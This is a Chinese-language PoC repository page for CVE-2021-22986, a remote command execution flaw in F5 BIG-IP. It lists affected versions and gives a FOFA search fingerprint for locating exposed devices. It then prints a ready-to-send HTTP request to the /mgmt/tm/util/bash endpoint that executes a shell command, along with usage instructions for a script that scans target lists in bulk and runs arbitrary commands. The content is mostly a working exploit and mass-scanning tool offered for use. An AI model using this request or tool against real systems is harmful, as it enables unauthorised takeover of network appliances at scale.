CVE-2021-22986 PoC — F5 BIG-IP 代码问题漏洞

Source

Associated Vulnerability

Description

F5 BIG-IP远程代码执行；cve-2021-22986，批量检测；命令执行利用

Readme

# F5 BIG-IP 远程命令执行漏洞（CVE-2021-22986）

## 漏洞影响

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

## fofa

icon_hash="-335242539"

## POC

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}
```

## 脚本使用

python3 CVE202122986.py --help

```bash
Usage: CVE202122986.py [OPTIONS]

Options:
  -u, --url TEXT   Target URL，对单一目标检测; Example:python3 CVE202122986.py -u https://ip:port

  -f, --file TEXT  Target File，对批量目标检测; Example:python3 CVE202122986.py -f ip.txt

  -c, --cmd TEXT   Target command，命令执行; Example: python3 CVE202122986.py -cmd id

  --help           Show this message and exit.
```

File Snapshot

 [4.0K]  /data/pocs/479863f347c0ce8a50685bec7cb023ca97e36119
├── [3.4K]  CVE202122986.py
├── [1.0K]  F5 BIG-IP 远程命令执行漏洞（CVE-2021-22986）.md
└── [1010]  README.md

0 directories, 3 files

Remarks